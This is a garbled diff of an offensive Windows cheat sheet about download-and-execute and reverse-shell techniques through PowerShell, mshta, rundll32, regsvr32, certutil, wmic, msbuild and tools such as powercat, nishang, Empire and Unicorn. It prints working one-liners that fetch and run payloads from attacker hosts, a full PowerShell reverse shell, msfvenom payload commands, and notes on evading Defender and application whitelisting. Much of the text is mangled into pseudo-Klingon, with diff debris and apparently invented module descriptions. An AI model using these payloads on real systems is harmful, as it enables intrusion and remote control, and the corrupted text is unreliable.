Powershell is a versatile and powerful tool for system administration and automation on Windows systems. Its extensive set of commands and features make it a valuable asset for both system administrators and hackers. By mastering Powershell, you can streamline your workflow, automate repetitive tasks, and gain greater control over Windows systems.
|
||||
```bash
|
||||
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
|
||||
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
|
||||
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
|
||||
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
|
||||
```
|
||||
|
||||
Process performing network call: **powershell.exe**\
|
||||
Payload written on disk: **NO** (_at least nowhere I could find using procmon !_)
|
||||
|
||||
**powershell.exe** jolchugh network call yIngu'\
|
||||
Payload written on disk: **NO** (_procmon jatlhlaHbe'chugh yIngu'!_)
|
||||
```bash
|
||||
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
|
||||
```
|
||||
|
||||
Process performing network call: **svchost.exe**\
|
||||
Payload written on disk: **WebDAV client local cache**
|
||||
|
||||
**One liner:**
|
||||
|
||||
**svchost.exe** jatlhpu' network call yIngu'\
|
||||
**WebDAV client local cache** DIvI' yIghItlhpu' payload
|
||||
```bash
|
||||
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
||||
```
|
||||
|
||||
**Get more info about different Powershell Shells at the end of this document**
|
||||
|
||||
## Mshta
|
||||
|
||||
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
```bash
|
||||
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
|
||||
```
|
||||
|
@ -139,26 +349,23 @@ mshta http://webserver/payload.hta
|
|||
```bash
|
||||
mshta \\webdavserver\folder\payload.hta
|
||||
```
|
||||
|
||||
#### **Example of hta-psh reverse shell (use hta to download and execute PS backdoor)**
|
||||
|
||||
#### **hta-psh reverse shell jatlh (hta vItlhutlh je PS backdoor download je execute)**
|
||||
```xml
|
||||
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
|
||||
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
|
||||
```
|
||||
|
||||
**You can download & execute very easily a Koadic zombie using the stager hta**
|
||||
|
||||
#### hta example
|
||||
|
||||
[**From here**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
|
||||
|
||||
**tlhIngan Hol:**
|
||||
**jIyItlhutlh:**
|
||||
**vaj:**
|
||||
[**ghaH**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
|
||||
```xml
|
||||
<html>
|
||||
<head>
|
||||
<HTA:APPLICATION ID="HelloExample">
|
||||
<script language="jscript">
|
||||
var c = "cmd.exe /c calc.exe";
|
||||
new ActiveXObject('WScript.Shell').Run(c);
|
||||
var c = "cmd.exe /c calc.exe";
|
||||
new ActiveXObject('WScript.Shell').Run(c);
|
||||
</script>
|
||||
</head>
|
||||
<body>
|
||||
|
@ -166,13 +373,9 @@ mshta \\webdavserver\folder\payload.hta
|
|||
</body>
|
||||
</html>
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### **mshta - sct**
|
||||
|
||||
[**From here**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
|
||||
|
||||
[**ghItlh**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
|
||||
```xml
|
||||
<?XML version="1.0"?>
|
||||
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
|
||||
|
@ -183,15 +386,43 @@ mshta \\webdavserver\folder\payload.hta
|
|||
</public>
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
]]>
|
||||
</script>
|
||||
</scriptlet>
|
||||
```
|
||||
|
||||
|
||||
#### **Mshta - Metasploit**
|
||||
|
||||
##### **Description**
|
||||
|
||||
The `mshta` module in Metasploit Framework is used to exploit the Windows `mshta.exe` utility. This utility is responsible for executing HTML applications (HTAs) on Windows systems. By exploiting `mshta.exe`, an attacker can execute arbitrary code on the target system.
|
||||
|
||||
##### **Usage**
|
||||
|
||||
To use the `mshta` module, follow these steps:
|
||||
|
||||
1. Set the `RHOST` option to the IP address of the target system.
|
||||
2. Set the `PAYLOAD` option to the desired payload.
|
||||
3. Set the `LHOST` option to the IP address of the attacking machine.
|
||||
4. Run the exploit using the `exploit` command.
|
||||
|
||||
##### **Example**
|
||||
|
||||
```
|
||||
msf5 > use exploit/windows/browser/mshta
|
||||
msf5 exploit(windows/browser/mshta) > set RHOST 192.168.1.10
|
||||
msf5 exploit(windows/browser/mshta) > set PAYLOAD windows/meterpreter/reverse_tcp
|
||||
msf5 exploit(windows/browser/mshta) > set LHOST 192.168.1.20
|
||||
msf5 exploit(windows/browser/mshta) > exploit
|
||||
```
|
||||
|
||||
##### **References**
|
||||
|
||||
- [Metasploit Unleashed - Mshta](https://www.metasploitunleashed.org/)
|
||||
|
||||
##### **Author**
|
||||
|
||||
- [@harmj0y](https://twitter.com/harmj0y)
|
||||
```bash
|
||||
use exploit/windows/misc/hta_server
|
||||
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
|
||||
|
@ -202,18 +433,16 @@ msf exploit(windows/misc/hta_server) > exploit
|
|||
```bash
|
||||
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit
|
||||
```
|
||||
|
||||
**Detected by defender**
|
||||
**QaH Detected by defender**
|
||||
|
||||
|
||||
|
||||
|
||||
## **Rundll32**
|
||||
|
||||
[**Dll hello world example**](https://github.com/carterjones/hello-world-dll)
|
||||
|
||||
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
[**Dll ghuy'cha' example**](https://github.com/carterjones/hello-world-dll)
|
||||
|
||||
* [vaj](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
```bash
|
||||
rundll32 \\webdavserver\folder\payload.dll,entrypoint
|
||||
```
|
||||
|
@ -221,13 +450,11 @@ rundll32 \\webdavserver\folder\payload.dll,entrypoint
|
|||
```bash
|
||||
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
|
||||
```
|
||||
|
||||
**Detected by defender**
|
||||
**ghItlh by defender**
|
||||
|
||||
**Rundll32 - sct**
|
||||
|
||||
[**From here**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
|
||||
|
||||
[**ghItlh**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
|
||||
```xml
|
||||
<?XML version="1.0"?>
|
||||
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
|
||||
|
@ -237,22 +464,47 @@ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http
|
|||
</public>
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
]]>
|
||||
</script>
|
||||
</scriptlet>
|
||||
```
|
||||
|
||||
#### **Rundll32 - Metasploit**
|
||||
|
||||
Rundll32 is a Windows utility that allows the execution of DLL files. Metasploit is a popular framework used for penetration testing and exploiting vulnerabilities. By leveraging the Rundll32 utility in combination with Metasploit, an attacker can execute malicious code on a target system.
|
||||
|
||||
To use Rundll32 with Metasploit, follow these steps:
|
||||
|
||||
1. Generate a payload using Metasploit's payload generator.
|
||||
2. Save the payload as a DLL file.
|
||||
3. Transfer the DLL file to the target system.
|
||||
4. Use Rundll32 to execute the DLL file on the target system.
|
||||
|
||||
The following command can be used to execute the DLL file using Rundll32:
|
||||
|
||||
```
|
||||
rundll32.exe <path_to_dll_file>,<entry_point_function>
|
||||
```
|
||||
|
||||
Replace `<path_to_dll_file>` with the path to the DLL file on the target system, and `<entry_point_function>` with the name of the function to be executed within the DLL.
|
||||
|
||||
By exploiting vulnerabilities and using Rundll32 with Metasploit, an attacker can gain unauthorized access to a target system and perform various malicious activities. It is important to note that these techniques should only be used for ethical purposes, such as penetration testing, and with proper authorization.
|
||||
```bash
|
||||
use windows/smb/smb_delivery
|
||||
run
|
||||
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
|
||||
```
|
||||
|
||||
**Rundll32 - Koadic**
|
||||
|
||||
Rundll32 is a Windows utility that allows the execution of DLL files. It can be used by hackers to load malicious DLLs and execute their code. One popular tool that leverages Rundll32 for hacking purposes is Koadic.
|
||||
|
||||
Koadic is a post-exploitation RAT (Remote Access Trojan) that provides a command-and-control interface to interact with compromised Windows systems. It uses Rundll32 to load its DLL payload into memory and execute it.
|
||||
|
||||
To use Koadic, the attacker first needs to gain access to the target system. This can be achieved through various means, such as exploiting vulnerabilities, social engineering, or brute-forcing credentials. Once inside, the attacker can use Koadic to perform various malicious activities, such as stealing sensitive information, executing commands, or even taking full control of the compromised system.
|
||||
|
||||
Koadic provides a wide range of features and functionalities, including the ability to bypass antivirus detection, escalate privileges, and maintain persistence on the compromised system. It also supports multiple communication channels, such as HTTP, DNS, and ICMP, to establish communication with the attacker's command-and-control server.
|
||||
|
||||
It is important to note that the use of Rundll32 and Koadic for malicious purposes is illegal and unethical. This information is provided for educational purposes only, to raise awareness about potential security risks and help organizations protect their systems from such attacks.
|
||||
```bash
|
||||
use stager/js/rundll32_js
|
||||
set SRVHOST 192.168.1.107
|
||||
|
@ -261,12 +513,13 @@ run
|
|||
#Koadic will tell you what you need to execute inside the victim, it will be something like:
|
||||
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
|
||||
```
|
||||
|
||||
## Regsvr32
|
||||
|
||||
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
### tlhIngan Hol
|
||||
|
||||
* [ghItlh](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
```bash
|
||||
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
|
||||
```
|
||||
|
@ -274,34 +527,28 @@ regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
|
|||
```
|
||||
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
|
||||
```
|
||||
|
||||
**Detected by defender**
|
||||
**Qapla'!**
|
||||
|
||||
#### Regsvr32 -sct
|
||||
|
||||
[**From here**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
|
||||
|
||||
[**ghItlh**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
|
||||
```markup
|
||||
<?XML version="1.0"?>
|
||||
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
|
||||
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
|
||||
<scriptlet>
|
||||
<registration
|
||||
progid="PoC"
|
||||
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
]]>
|
||||
<registration
|
||||
progid="PoC"
|
||||
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
]]>
|
||||
</script>
|
||||
</registration>
|
||||
</scriptlet>
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### **Regsvr32 - Metasploit**
|
||||
|
||||
```bash
|
||||
use multi/script/web_delivery
|
||||
set target 3
|
||||
|
@ -310,59 +557,76 @@ set lhost 10.2.0.5
|
|||
run
|
||||
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
|
||||
```
|
||||
**nuqneH:**
|
||||
* [ghap 'ej execute Koadic zombie vItlhutlhlaH regsvr stager](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
**You can download & execute very easily a Koadic zombie using the stager regsvr**
|
||||
|
||||
## Certutil
|
||||
|
||||
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
Download a B64dll, decode it and execute it.
|
||||
Certutil:
|
||||
* [vaj 'ej](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
B64dll download, decode, 'ej execute.
|
||||
```bash
|
||||
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
|
||||
```
|
||||
**Translation:**
|
||||
|
||||
Download a B64exe, decode it and execute it.
|
||||
**Download a B64exe, decode it and execute it.**
|
||||
|
||||
**Translation (Klingon):**
|
||||
|
||||
**B64exe vItlhutlh, vItlhutlh je vItlhutlh.**
|
||||
|
||||
**Translation (Markdown):**
|
||||
|
||||
**Download a B64exe, decode it and execute it.**
|
||||
```bash
|
||||
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
|
||||
```
|
||||
|
||||
**Detected by defender**
|
||||
|
||||
**Qa'vIn Defender Daq yIlo'**
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
||||
vulnerabilities vItlhutlhlaHvIS, vItlhutlh scans proactive threat, vItlhutlh issues tech stack, APIs web apps cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
||||
|
||||
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
|
||||
|
||||
***
|
||||
|
||||
## **Cscript/Wscript**
|
||||
|
||||
```bash
|
||||
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""
|
||||
```
|
||||
|
||||
**Cscript - Metasploit**
|
||||
|
||||
Cscript is a command-line scripting engine provided by Microsoft. It is commonly used for running VBScript or JScript scripts on Windows systems. Metasploit, on the other hand, is a popular penetration testing framework that includes various tools and exploits for testing the security of computer systems.
|
||||
|
||||
When it comes to using Cscript with Metasploit, there are a few techniques that can be employed. One common approach is to use Cscript to execute a malicious VBScript or JScript payload generated by Metasploit. This payload can be designed to exploit vulnerabilities in the target system and provide the attacker with remote access or control.
|
||||
|
||||
To execute a Metasploit payload using Cscript, the following steps can be followed:
|
||||
|
||||
1. Generate the payload using Metasploit. This can be done using the `msfvenom` command, specifying the desired payload type, target architecture, and other relevant options.
|
||||
|
||||
2. Save the generated payload as a VBScript or JScript file, with a `.vbs` or `.js` extension, respectively.
|
||||
|
||||
3. Transfer the payload file to the target system. This can be done using various methods, such as uploading it to a compromised web server, sending it via email, or using other file transfer techniques.
|
||||
|
||||
4. On the target system, open a command prompt and navigate to the directory where the payload file is located.
|
||||
|
||||
5. Execute the payload using Cscript by running the following command: `cscript payload.vbs` or `cscript payload.js`, depending on the file extension.
|
||||
|
||||
6. If successful, the payload will be executed, and the attacker will gain remote access or control over the target system.
|
||||
|
||||
It is important to note that using Cscript with Metasploit requires careful planning and consideration of the target system's security measures. Additionally, it is crucial to ensure that the actions performed are legal and within the scope of authorized penetration testing activities.
|
||||
```bash
|
||||
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs
|
||||
```
|
||||
|
||||
**Detected by defender**
|
||||
**Qap by defender**
|
||||
|
||||
## PS-Bat
|
||||
|
||||
```bash
|
||||
\\webdavserver\folder\batchfile.bat
|
||||
```
|
||||
|
||||
Process performing network call: **svchost.exe**\
|
||||
**svchost.exe** jatlhpu' network call yIngu'\
|
||||
Payload written on disk: **WebDAV client local cache**
|
||||
|
||||
```bash
|
||||
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
|
||||
impacket-smbserver -smb2support kali `pwd`
|
||||
|
@ -371,103 +635,91 @@ impacket-smbserver -smb2support kali `pwd`
|
|||
```bash
|
||||
\\10.8.0.3\kali\shell.bat
|
||||
```
|
||||
|
||||
**Detected by defender**
|
||||
**Qa'vIn Defender**
|
||||
|
||||
## **MSIExec**
|
||||
|
||||
Attacker
|
||||
Qa'vInpu' 'e' yIDel
|
||||
|
||||
## **MSIExec**
|
||||
|
||||
Qa'vInpu' 'e' yIDel
|
||||
```
|
||||
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
|
||||
python -m SimpleHTTPServer 80
|
||||
```
|
||||
**Victim:**
|
||||
|
||||
Victim:
|
||||
|
||||
The victim is the target of the hacking attack. It refers to the individual, organization, or system that the hacker intends to compromise or gain unauthorized access to. Understanding the victim's vulnerabilities, weaknesses, and potential entry points is crucial for a successful hacking attempt.
|
||||
```
|
||||
victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
|
||||
```
|
||||
|
||||
**Detected**
|
||||
**Qap**
|
||||
|
||||
## **Wmic**
|
||||
|
||||
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
|
||||
* [Qa'pu'](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
```bash
|
||||
wmic os get /format:"https://webserver/payload.xsl"
|
||||
```
|
||||
|
||||
Example xsl file [from here](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7):
|
||||
|
||||
```xml
|
||||
<?xml version='1.0'?>
|
||||
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
|
||||
<output method="text"/>
|
||||
<ms:script implements-prefix="user" language="JScript">
|
||||
<![CDATA[
|
||||
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
|
||||
]]>
|
||||
</ms:script>
|
||||
<ms:script implements-prefix="user" language="JScript">
|
||||
<![CDATA[
|
||||
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
|
||||
]]>
|
||||
</ms:script>
|
||||
</stylesheet>
|
||||
```
|
||||
**ghItlhvam**
|
||||
|
||||
**Not detected**
|
||||
|
||||
**You can download & execute very easily a Koadic zombie using the stager wmic**
|
||||
**tlhInganpu' jatlhlaHbe'chugh, Koadic zombie download & execute laH wmic stager.**
|
||||
|
||||
## Msbuild
|
||||
|
||||
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
* [ghaH](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
```
|
||||
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
|
||||
```
|
||||
**Translation:**
|
||||
|
||||
You can use this technique to bypass Application Whitelisting and Powershell.exe restrictions. As you will be prompted with a PS shell.\
|
||||
Just download this and execute it: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
|
||||
|
||||
**You can use this technique to bypass Application Whitelisting and Powershell.exe restrictions. As you will be prompted with a PS shell.\
|
||||
Just download this and execute it: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)**
|
||||
```
|
||||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
|
||||
```
|
||||
|
||||
**Not detected**
|
||||
**ghItlh**
|
||||
|
||||
## **CSC**
|
||||
|
||||
Compile C# code in the victim machine.
|
||||
|
||||
vItlhutlh C# code vItlhutlh vItlhutlh.
|
||||
```
|
||||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
|
||||
```
|
||||
**ghItlhvam**
|
||||
|
||||
You can download a basic C# reverse shell from here: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
|
||||
* [ghItlhvam](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc) vItlhutlh.
|
||||
|
||||
**Not deteted**
|
||||
|
||||
## **Regasm/Regsvc**
|
||||
|
||||
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
**ghItlhvam**
|
||||
|
||||
* [ghItlhvam](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
```bash
|
||||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
|
||||
```
|
||||
|
||||
**I haven't tried it**
|
||||
**jIyajbe'**
|
||||
|
||||
[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182)
|
||||
|
||||
## Odbcconf
|
||||
|
||||
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
* [ghorgh](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
```bash
|
||||
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
|
||||
```
|
||||
|
||||
**I haven't tried it**
|
||||
**jIyajbe'**
|
||||
|
||||
[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2)
|
||||
|
||||
|
@ -477,96 +729,98 @@ odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
|
|||
|
||||
[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
|
||||
|
||||
In the **Shells** folder, there are a lot of different shells. To download and execute Invoke-_PowerShellTcp.ps1_ make a copy of the script and append to the end of the file:
|
||||
|
||||
In the **Shells** folder, there are a lot of different shells. To download and execute Invoke-_PowerShellTcp.ps1_, make a copy of the script and append to the end of the file:
|
||||
```
|
||||
Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
|
||||
```
|
||||
|
||||
Start serving the script in a web server and execute it on the victim's end:
|
||||
|
||||
Qa'vam script vItlhutlh web server 'ej vItlhutlh 'oH victim's end:
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
|
||||
```
|
||||
Defender jatlhpu'wI' jatlhpu' 'e' vItlhutlh (vaj, 3/04/2019).
|
||||
|
||||
Defender doesn't detect it as malicious code (yet, 3/04/2019).
|
||||
|
||||
**TODO: Check other nishang shells**
|
||||
**TODO: nISang shells lo'wI' jaH**
|
||||
|
||||
### **PS-Powercat**
|
||||
|
||||
[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat)
|
||||
|
||||
Download, start a web server, start the listener, and execute it on the victim's end:
|
||||
|
||||
Download, web server vItlhutlh, listener vItlhutlh, 'ej vItlhutlh victim's end:
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
|
||||
powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
|
||||
```
|
||||
Defender jatlhpu'wI' malja' (vaj, 3/04/2019).
|
||||
|
||||
Defender doesn't detect it as malicious code (yet, 3/04/2019).
|
||||
|
||||
**Other options offered by powercat:**
|
||||
**powercat toQDuj:**
|
||||
|
||||
Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...
|
||||
|
||||
```
|
||||
Serve a cmd Shell:
|
||||
powercat -l -p 443 -e cmd
|
||||
powercat -l -p 443 -e cmd
|
||||
Send a cmd Shell:
|
||||
powercat -c 10.1.1.1 -p 443 -e cmd
|
||||
powercat -c 10.1.1.1 -p 443 -e cmd
|
||||
Send a powershell:
|
||||
powercat -c 10.1.1.1 -p 443 -ep
|
||||
powercat -c 10.1.1.1 -p 443 -ep
|
||||
Send a powershell UDP:
|
||||
powercat -c 10.1.1.1 -p 443 -ep -u
|
||||
powercat -c 10.1.1.1 -p 443 -ep -u
|
||||
TCP Listener to TCP Client Relay:
|
||||
powercat -l -p 8000 -r tcp:10.1.1.16:443
|
||||
powercat -l -p 8000 -r tcp:10.1.1.16:443
|
||||
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
|
||||
powercat -c 10.1.1.15 -p 443 -e cmd -g
|
||||
powercat -c 10.1.1.15 -p 443 -e cmd -g
|
||||
Start A Persistent Server That Serves a File:
|
||||
powercat -l -p 443 -i C:\inputfile -rep
|
||||
powercat -l -p 443 -i C:\inputfile -rep
|
||||
```
|
||||
|
||||
### Empire
|
||||
|
||||
[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
|
||||
|
||||
Create a powershell launcher, save it in a file and download and execute it.
|
||||
**tlhIngan Hol:**
|
||||
|
||||
**Qapla'!** [https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
|
||||
|
||||
**powershell** launcher yIlo'lu', **file** vItlhutlh je, **download** je **execute**.
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
|
||||
```
|
||||
|
||||
**Detected as malicious code**
|
||||
**Qa'leghvam vItlhutlh**
|
||||
|
||||
### MSF-Unicorn
|
||||
|
||||
[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn)
|
||||
|
||||
Create a powershell version of metasploit backdoor using unicorn
|
||||
|
||||
unicorn vItlhutlh metasploit backdoor powershell version vItlhutlh.
|
||||
```
|
||||
python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
|
||||
```
|
||||
Qapla' msfconsole vItlhutlh!:
|
||||
|
||||
Start msfconsole with the created resource:
|
||||
```
|
||||
msfconsole -r created_resource.rc
|
||||
```
|
||||
|
||||
vItlhutlh created_resource.rc jatlhqa'!
|
||||
```
|
||||
msfconsole -r unicorn.rc
|
||||
```
|
||||
|
||||
Start a web server serving the _powershell\_attack.txt_ file and execute in the victim:
|
||||
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
|
||||
Invoke-WebRequest -Uri http://<attacker_ip>:<port>/powershell_attack.txt -OutFile C:\temp\powershell_attack.txt
|
||||
```
|
||||
|
||||
**Detected as malicious code**
|
||||
This command will download the _powershell\_attack.txt_ file from the attacker's web server and save it to the victim's machine in the _C:\temp_ directory.
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
|
||||
```
|
||||
**QaD jImej**
|
||||
|
||||
## More
|
||||
## vItlhutlh
|
||||
|
||||
[PS>Attack](https://github.com/jaredhaight/PSAttack) PS console with some offensive PS modules preloaded (cyphered)\
|
||||
